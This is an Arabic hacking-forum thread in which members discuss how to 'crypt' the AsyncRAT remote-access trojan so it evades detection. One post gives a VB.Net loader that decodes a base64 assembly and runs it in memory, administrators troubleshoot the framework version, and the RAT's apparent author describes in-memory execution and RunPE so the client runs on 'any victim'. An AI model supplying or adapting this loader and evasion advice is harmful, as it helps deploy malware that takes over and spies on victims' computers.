[ نقاش ] هل يمكن تشفير سيرفر AsyncRAT


  • الـلـهـم انـصـر اخـوانـنـا الـمـسـلـمـيـن فـي بـورمـا وكـن مـعـهـم يـاربـاه يـاربـاه

الحالة
مغلق و غير مفتوح للمزيد من الردود.

test hack

:: عضو جديد ::
23 يوليو 2019
14
12
0
السلام عليكم ورحمة الله وبركاته
بدون اطالة أخواني
عند تجربتي لتشفير سيرفر AsyncRAT للأخ الفاضل NYAN CAT
بإستخدام بيس64 عادية في c#
يظهر خطأ

1868

او VB.Net نفس النتيجة

فهل له طريقة خاصة في التشفير ؟ وما هي ؟
أم سنضطر لتشفيره كــ (Native)
والسلام عليكم ورحمة الله


 
  • أعجبني
التفاعلات: NYAN CAT

Casp3r

.:: Administrator ::.
طاقم الإدارة
23 مارس 2019
1,220
483
0
السلام عليكم ورحمة الله وبركاته
بدون اطالة أخواني
عند تجربتي لتشفير سيرفر AsyncRAT للأخ الفاضل NYAN CAT
بإستخدام بيس64 عادية في c#
يظهر خطأ

مشاهدة المرفق 1868

او VB.Net نفس النتيجة

فهل له طريقة خاصة في التشفير ؟ وما هي ؟
أم سنضطر لتشفيره كــ (Native)
والسلام عليكم ورحمة الله


هنالك خطأ بالكود اخي ممكن تعطينا اياه
او ممكن تحتاج تعدل على الكلاينت
حسب الوضع
اعطيني الكود وخلينا نشوف
 
  • أعجبني
التفاعلات: NYAN CAT و Mr.Ali

BasharBachir

اللهم اغفر له وارحمه
طاقم الإدارة
28 أكتوبر 2018
2,856
4,034
1
بماانك لم تطرح لنا سورس التشفير فماندري ان كان فيه مشكلة باكوادك اخي
على كل اتوقع السبب انك حاطط الTarget Framework على اقل من 4.0 => الكلاينت يحتاج من 4 وفوق
 
  • أعجبني
التفاعلات: NYAN CAT و Mr.Ali

test hack

:: عضو جديد ::
23 يوليو 2019
14
12
0
طبعا هي ليست تشفيرة ولكن فقط تجربة او محاولة للتشفير مجرد بيس64 وانتري بوينت
كود:
Module hack
    Sub Main()
        System.Reflection.Assembly.Load(Convert.FromBase64String("TV.....=")).EntryPoint.Invoke(Nothing, Nothing)
    End Sub
End Module
طبعا كلام الاخ بشار صحيح وهو ان ستب برنامج NYAN يعمل علي نت فريم ورك 4 لذا يلزم ان يكون المشروع 4 او ما فوق وهذا عيب خطير جدا في الرات ولكن اعتقد ان الاخ NYAN فقط نسي او ماشابه لانه اعتاد ان يظل الفيجوال مضبوط علي 4 الا اذا كان الستب يحتوي علي أكواد تتطلب نت فريم 4 وهذا امر أخر
ولكن طبعا سورس الستب طبعا عند الاخ NYAN ويمكن تعديل نت فريم ورك واعادة نشر الستب في اقرب وقت حتي يعمل كلاينت عند اي ضحية لان الرات رائع ولكن ينقصه هذا شيء فقط
يمكن تعديله هكذا
Application -> compile -> Advanced compile setting -> target framework

 
  • أعجبني
التفاعلات: NYAN CAT و Mr.Ali

NYAN CAT

ᴄᴀғғᴇɪɴᴇ ᴅᴇᴘᴇɴᴅᴇɴᴄᴇ
8 يناير 2019
504
1,335
Kuwait
github.com
0
أهلا بالغالي. آسف على ردي المتأخر ولكن حالياً مشغول حبتين.

عموماً الأخ العزيز بشار أعطاك الإجابة الصحيحه. يجب عليك العمل على فريم 4.0 ولا داعي للذهاب إلى 4.5 وأكبر.

AsyncRAT هو رات يعمل عمل Loader فبتالي وجب علي كتابته بفريم 4.0 لكي تستطيع تنفيذ برامج رات مثل Orcus وغيرها في الذاكرة.

بمعنى الأخر تستطيع تشغيل أي ملف 2.0 3.5 4.0 في الذاكرة عن طريق خيار Send File => To Memory وعلاوة على ذلك تستطيع تنفيذه عن طريق RunPE لو أحببت.

🌹🌹
 
  • أعجبني
التفاعلات: SuLtAn-YE و Mr.Ali
الحالة
مغلق و غير مفتوح للمزيد من الردود.